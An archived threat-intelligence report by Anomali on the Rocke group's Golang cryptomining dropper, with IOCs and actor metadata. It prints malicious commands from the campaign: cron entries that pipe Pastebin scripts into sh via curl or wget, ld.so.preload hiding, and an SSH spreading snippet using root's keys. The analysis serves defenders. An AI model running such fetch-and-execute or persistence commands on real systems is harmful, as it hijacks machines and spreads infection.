{ "id": "3b24444d-550b-4be5-98d8-5dfc952aeb98", "created_at": "2026-04-06T00:20:19.956703Z", "updated_at": "2026-04-10T03:38:10.025217Z", "deleted_at": null, "sha1_hash": "3922d6284d2b5b34fdc4e9ce031a20db716034b8", "title": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3086929, "plain_text": "Rocke Evolves Its Arsenal With a New Malware Family Written in\r\nGolang | Anomali Labs\r\nBy Anomali Threat Research\r\nArchived: 2026-04-05 13:04:58 UTC\r\nThe “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how\r\nthey’re stealing your cycles.\r\nSummaryIntroductionTechnical DetailsOverlapping TTPs with previous campaignsConclusionMitre\r\nATT\u0026CKIOCsEndnotes\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 1 of 8\n\nSummary\r\nThe “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how\r\nthey’re stealing your cycles. Rocke is actively updating and pushing a new dropper using Pastebin for Command\r\nand Control (C2). Recent updates to the C2 as of March 13th, 2019 have been seen, which leads researchers to\r\nbelieve this campaign is ongoing. According to VirusTotal, the threat detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use “ld.so.preload” function to hook libc\r\nfunctions. The hooking is used to hide the dropper and the mining software installed by the malware and prevents\r\nit from showing up in the “currently running” process list. This tactic is being utilized by the group in this new\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 2 of 8\n\ncampaign. The miner uses a private mining pool hosted on DigitalOcean which is a change in the threat actor’s\r\nprevious tactics.\r\nIntroduction\r\nThe threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo\r\nAlto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which\r\nthe group utilized a malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On\r\nMarch 12th, 2019, Anomali Research has, with high confidence, identified a new active campaign that we believe\r\nis being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner\r\nonto a machine to mine Monero cryptocurrency. This ongoing campaign has extensive Tactics Techniques and\r\nProcedures (TTPs) that overlap with the report published by Unit 42.\r\nThis campaign is different from prior activity because a new dropper was observed being used by Rocke that is\r\nwritten in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that\r\nonly one engine successfully detected it as malicious. The low detection rate of the malware coupled with the\r\ntechniques that prevent the Rocke malicious processes from showing up in the running processes of victim\r\nmachines, raises the possibility that this campaign has been successfully running for weeks.\r\nScanning results from VirusTotal for one of the malware samples\r\nFigure 1: Scanning results from VirusTotal for one of the malware samples.\r\nTechnical Details\r\nAnalysis of the Dropper\r\nThe samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided\r\nby the UPX project. Instead of having the “UPX!” string, it has been replaced with “LSD!”. Repairing the header\r\nis needed to unpack the samples using the unpacker provided by the UPX team.\r\nThe dropper is written in Go (Golang) and the estimated source code structure, based on the decompiler, is shown\r\nbelow:\r\n Package main: /root/go/src/github.com/hippies/LSD File: main.go goatt Lines: 12 to 17 (5)\r\nThe main execution process can be summarized in the following steps:\r\n1. Delete “/etc/ld.so.preload” if it exists\r\n2. Get the PID of the process and writes it to “/tmp/.lsdpid”\r\n3. Uses “chattr -i” to mark the PID file protected so it cannot be modified\r\n4. Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”\r\n5. Turns the modified time stamp on the moved file back 416 days\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 3 of 8\n\n6. Installs an “init.d” startup script to “/etc/init.d/netdns” and a systemd service script to\r\n“/usr/lib/systemd/system/netdns.service”; the modified time is also changed for these files in the same way\r\n7. Enabling the service on the compromised system by executing: “chkconfig --add netdns” and “systemctl\r\nenable netdns”\r\n8. Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”\r\n9. Writes code to “/usr/local/lib/libcset.c”\r\n10. Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”\r\n11. If GCC is not installed it tries to install it and recompile “yum -y install gcc -y||apt-get -y install gcc”\r\n12. Adds the path to the shared object to “/etc/ld.so.preload” and protects the file from modifications\r\n13. Persistence is added through Cron by executing echo \"*/10 * * * * (curl -fsSL\r\nhttps://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh\" | crontab - and by\r\nadding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O-https://pastebin.com/raw/yPRSa0ki)|sh” to  “/var/spool/cron/crontabs/root”\r\n14. Checking for updates by checking the version listed at “https://pastebin.com/raw/HWBVXK6H”\r\n15. Installs the Monero miner at “/tmp/kintegrityds” and protects it\r\n16. The miner connects to a private pool hosted on DigitalOcean with IP and port of: 134.209.104.20:51640\r\nThe malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to\r\ndetermine the machines external host so it does not attack itself.\r\nCommand and Control\r\nThe malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is\r\nused to check for the latest version of the malware. If a new version is available, the malware reaches out to\r\n“https://pastebin[.]com/yPRSa0ki”. The paste shown below serves as a redirect to the actual setup stript.\r\n (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's\r\nThe setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the\r\nthreat actors’ malware instead. It will also try to use known SSH hosts and the SSH key on the machine to spread\r\nlatterly.\r\n export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo \"*/10 * * * * (curl -fsSL https\r\nThe Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were\r\nadded on February 24th, 2019.\r\nPastebin profile used by the threat actor\r\nFigure 2: Pastebin profile used by the threat actor\r\nThe server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below.\r\nThe page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 4 of 8\n\nImage hosting site from where the malware is downloaded from\r\nFigure 3: Image hosting site from where the malware is downloaded from.\r\nAccording to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is\r\nalso registered by the same email (4592248@gmail[.]com) as another domain that was used in an earlier Rocke\r\ncampaign which indicates that it is likely the site is controlled by the threat group.[3]\r\n Domain Name: SOWCAR.COM Registry Domain ID: 2277522871_DOMAIN_COM-VRSN Registrar WHOIS Server\r\nOverlapping TTPs with previous campaigns\r\nThe current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both\r\ncampaigns, the group uses Pastebin for C2 and the C2 system depends on 3 public pastes. One paste serves the\r\nlatest version, one acts as a redirect to the third that is used to initialize the infection. The redirect uses either\r\n“cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh”\r\nafter some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a\r\nsimilar pattern. In this campaign the username is “SYSTEMTEN” while last campaign username was\r\n“SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.\r\nThe filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to\r\ndownload the payload in this campaign and the campaign reported by Unit 42. The filenames have the same\r\nstructure, with some of the numbers overlapping.\r\n http://sowcar.com/t6/678/1552060180x1822611359.jpg https://master.minerxmr.ru/2/1551434778x272832903\r\nThe malware uses cron for persistence. The similar crontab entries are shown below. The only difference between\r\nthe entries are the ID of paste used.\r\nCron jobs created by the Python version of the malware:\r\n \"*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/\r\nCron jobs created by the Go version of the malware:\r\n */10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/ra\r\nIn this campaign, the threat actor also uses “init” and “systemd” services for persistence. The name of the service\r\nis “netdns.” Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the\r\nserviced called netdns. After the file is created, the access and modified time is changed before the file is marked\r\nas non-modifiable. The same technique is used by the new malware written in Go.\r\n curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 5 of 8\n\nThe spreading technique observed by Anomali researchers is the same one used in previous campaigns. The\r\nmalware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are\r\ncode snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh\r\nkeys and known hosts if they are available to infect other machines.\r\nLast campaign\r\n if [ -f /root/.ssh/known_hosts ] \u0026\u0026 [ -f /root/.ssh/id_rsa.pub ]; then for h in $\r\nCurrent campaign\r\n if [ -f /root/.ssh/known_hosts ] \u0026\u0026 [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE \"([0-9]{\r\nIn addition to the propagation over SSH, the new malware tries to compromise Redis servers just like the Python-based malware.\r\nThere is also overlap of infrastructure. The email used to register the sowcar[.]com domain also registered\r\nthyrsi[.]com. This domain was reported on and linked to the same threat group in a report by Cisco Talos in\r\nDecember 2018. The domains registered by this email address is shown in the figure below.\r\nDomains registered by the same email address\r\nFigure 4: Domains registered by the same email address.\r\nConclusion\r\nAnomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed\r\nfrom using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly\r\nnon-existent. In addition, the group uses a private mining pool to reduce the risks of being detected.\r\nMitre ATT\u0026CK\r\nT1190 Exploit Public-Facing Application\r\nT1078 Valid Accounts\r\nT1168 Local Job Scheduling\r\nT1110 Brute Force\r\nT1222 File Permissions Modification\r\nT1021 Remote Services\r\nT1064 Scripting\r\nT1045 Software Packing\r\nT1071 Standard Application Layer Protocol\r\nT1099 Timestomp\r\nT1055 Process Injection\r\nT1036 Masquerading\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 6 of 8\n\nIOCs\r\nURLS\r\n https://pastebin[.]com/raw/yPRSa0ki https://pastebin[.]com/raw/wDBa7jCQ https://pastebin[.]com/raw/D\r\nSHA256\r\n 029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd 93efdee9def596b93517699958e7a5c3f0b\r\nMining pool\r\n134.209.104.20:51640\r\nEndnotes\r\nDavid Liedenberg, “Rocke: The Champion of Monero Miners,” Talos Blog, accessed March 14, 2019,\r\npublished August 30, 2018.\r\nXingyu Jin and Claud Xiao, “Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud\r\nSecurity Products,” Palo Alto Networks, accessed March 14, 2019, published January 17, 2019.\r\nDavid Liebenberg and Andrew Williams, “Connecting the dots between recently active cryptominers,”\r\nTalos Blog, accessed March 14, 2019, published December 18, 2018.\r\nIran’s IRGC Names Western Tech Giants as “Legitimate Targets”: What CISOs Must Do Now\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 7 of 8\n\nWhen 766 Systems Fall in 24 Hours: The Threats Bearing Down on State Government Networks\r\nThe Iran Cyber Threat Machine Isn’t Slowing Down — Here’s What CISOs Need to Know Now\r\nSource: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 8 of 8\n\n https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang \nWhen 766 Systems Fall in 24 Hours: The Threats Bearing Down on State Government Networks\nThe Iran Cyber Threat Machine Isn’t Slowing Down-Here’s What CISOs Need to Know Now\nSource: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang \n Page 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" ], "report_names": [ "rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" ], "threat_actors": [ { "id": "7c053836-8f50-4d40-bc5c-7088967e1b57", "created_at": "2022-10-25T16:07:24.549525Z", "updated_at": "2026-04-10T02:00:05.03048Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra", "G0106", "Iron Group", "Rocke" ], "source_name": "ETDA:Rocke", "tools": [ "Godlua", "Kerberods", "LSD", "Pro-Ocean", "Xbash" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "905eabd9-2b7f-483d-86bd-0c72f96b4162", "created_at": "2023-01-06T13:46:39.02749Z", "updated_at": "2026-04-10T02:00:03.185957Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra" ], "source_name": "MISPGALAXY:Rocke", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f", "created_at": "2022-10-25T15:50:23.360509Z", "updated_at": "2026-04-10T02:00:05.337702Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Rocke" ], "source_name": "MITRE:Rocke", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434819, "ts_updated_at": 1775792290, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.pdf", "text": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.txt", "img": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.jpg" } }